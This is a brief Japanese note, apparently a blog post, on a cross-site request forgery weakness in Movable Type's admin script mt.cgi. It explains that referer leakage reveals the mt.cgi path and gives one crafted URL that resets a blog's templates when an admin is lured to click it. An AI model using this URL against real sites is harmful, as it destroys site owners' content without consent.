管理画面から外部へのアンカーを踏ませる。
アクセス解析からmt.cgiまでのURLがバレバレ。
http://xxxxxxx/mt/mt.cgi?__mode=reset_blog_templates&blog_id=BLOGID
とか踏ませる、はっぱふみふみ攻撃。